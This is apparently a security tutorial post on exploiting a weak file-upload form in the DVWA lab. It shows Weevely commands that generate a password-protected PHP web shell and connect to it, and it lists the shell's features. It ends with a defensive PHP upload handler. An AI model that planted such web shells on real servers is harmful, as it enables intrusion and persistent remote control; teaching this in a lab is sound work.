Hello friends. Today we are going to learn about a very common website vulnerability. Many websites include a contact form, a registration form, or an upload form for images, doc files, etc. If the code behind that form is weak, an attacker can exploit it by uploading an executable file. For example, on an Apache server a .php file is executed by the server and can perform various operations. So if an attacker is able to upload a reverse PHP shell to the target, he/she can get remote access to the target system.
Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.
Upload the Weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Run Meterpreter payloads
- Port scan pivoting on target
- Mount the remote filesystem
- Bruteforce SQL accounts pivoting on the target
For this demonstration, I am using DVWA (Damn Vulnerable Web Application), which is freely available. If you don't know how to set up DVWA, refer to this link https://youtu.be/3IdVWz_RaZo and set the security level to Low.
Generate a PHP file using Weevely:
weevely generate 123456 hack.php
Here 123456 is the password you will use when connecting to the victim, and hack.php is the file name; you can give it any name.
After creating the file, upload it to your target system.
Connect to the victim:
weevely [URL of our PHP file] password
Ex: weevely http://192.168.0.101/dvwa/hackable/uploads/hack.php 123456
After a successful connection you are able to perform lots of actions; for a better understanding, go with virtual learning.
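The weak upload code this post relies on can be fixed on the server side. The following is an added example, not DVWA's or Weevely's code: a PHP upload handler that decides the file type from the content, picks its own file name and extension, and stores the file outside the web root. The form field name `uploaded`, the directory path and the size limit are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not DVWA's code. Assumed: form field "uploaded",
// a storage directory outside the document root, a 2 MiB size limit.
const UPLOAD_DIR = '/var/www/private_uploads'; // assumed path, not served by Apache
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = (string) $file['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) > MAX_BYTES) {
        throw new RuntimeException('not an HTTP upload, or too large');
    }
    // Type comes from the file content, never from the client-supplied
    // name or Content-Type header (both are attacker-controlled).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('file type not allowed');
    }
    // Server-chosen random name and extension: "hack.php" or "x.php.jpg"
    // from the client never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($tmp, UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    chmod(UPLOAD_DIR . '/' . $name, 0640); // no execute bit
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['uploaded'])) {
    try {
        echo 'stored as ' . store_upload($_FILES['uploaded']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ' . $e->getMessage();
    }
}
```

Because the stored file never carries a .php extension and sits outside the document root, a file that passes the content check while embedding PHP is still not executed by Apache.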